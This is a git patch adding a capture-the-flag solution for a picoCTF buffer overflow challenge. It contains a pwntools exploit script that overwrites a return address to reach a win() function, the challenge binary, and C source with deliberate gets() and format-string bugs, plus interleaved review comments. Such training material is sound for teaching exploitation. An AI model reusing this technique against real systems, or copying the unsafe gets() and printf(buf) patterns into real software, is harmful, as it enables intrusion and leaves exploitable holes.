From 2e33defa564a0325aa9458b98cf4fffbe778f4c0 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 19:33:13 +0200
Subject: [PATCH] pwn/buffer_overflow_1

---
 pwn/buffer_overflow_1/solve.py |  31 ++++++++++++++++++++++++
 pwn/buffer_overflow_1/vuln     | Bin 0 -> 15704 bytes
 pwn/buffer_overflow_1/vuln.c   |  42 +++++++++++++++++++++++++++++++++
 3 files changed, 73 insertions(+)
 create mode 100755 pwn/buffer_overflow_1/solve.py
 create mode 100755 pwn/buffer_overflow_1/vuln
 create mode 100644 pwn/buffer_overflow_1/vuln.c

diff --git a/pwn/buffer_overflow_1/solve.py b/pwn/buffer_overflow_1/solve.py
new file mode 100755
index 0000000..60b811c
--- /dev/null
+++ b/pwn/buffer_overflow_1/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  r.recvuntil(b"Please enter your string:")
+  offset = 44 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
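Review bot: The `offset = 44` on the payload line is a hard-coded value with no check that the overwrite actually lands, and `print(r.recvall())` only dumps whatever comes back, so a wrong offset on the remote build is indistinguishable from a missing flag.txt. vuln.c in this same commit prints the return address it is about to jump to, so the script can verify the hijack before trusting the output: after `r.sendline(payload)`, add `line = r.recvline_contains(b"Jumping to")` and `assert hex(exe.sym.win).encode() in line, line` before the final `recvall()`. Two smaller points: `PORT` is left as a `str` from the `split()` — pwntools appears to coerce it, but `remote(ADDR, int(PORT))` makes the intent explicit — and `main()` is indented with two spaces while `conn()` uses four; pick one for the file.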
diff --git a/pwn/buffer_overflow_1/vuln b/pwn/buffer_overflow_1/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..05e89bfb6fde125a2649cb0b23dc1bfef1bdff09
GIT binary patch
literal 15704
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
CtUBue

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_1/vuln.c b/pwn/buffer_overflow_1/vuln.c
new file mode 100644
index 0000000..e2dcd2c
--- /dev/null
+++ b/pwn/buffer_overflow_1/vuln.c
@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+
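Review bot: The `#include "asm.h"` on the first line supplies `get_return_address()`, which `vuln()` calls, but the diffstat adds only solve.py, the binary and vuln.c, so this source cannot be rebuilt from the committed tree; either add asm.h or put a header comment on vuln.c saying it is a reference copy and the shipped `vuln` binary is the authoritative artifact. Because `gets(buf)` in `vuln()` and `printf(buf)` in `win()` are the intended challenge bugs rather than oversights, mark them so a later cleanup does not silently remove them, e.g. `/* intentionally vulnerable: unbounded gets() into a 32-byte stack buffer */` above the `gets` call and `/* intentionally vulnerable: flag contents are used as a format string */` above `printf(buf)`. Note that the second one also means a `%` in flag.txt is interpreted as a conversion, which is worth stating in the comment since it changes what the solver sees.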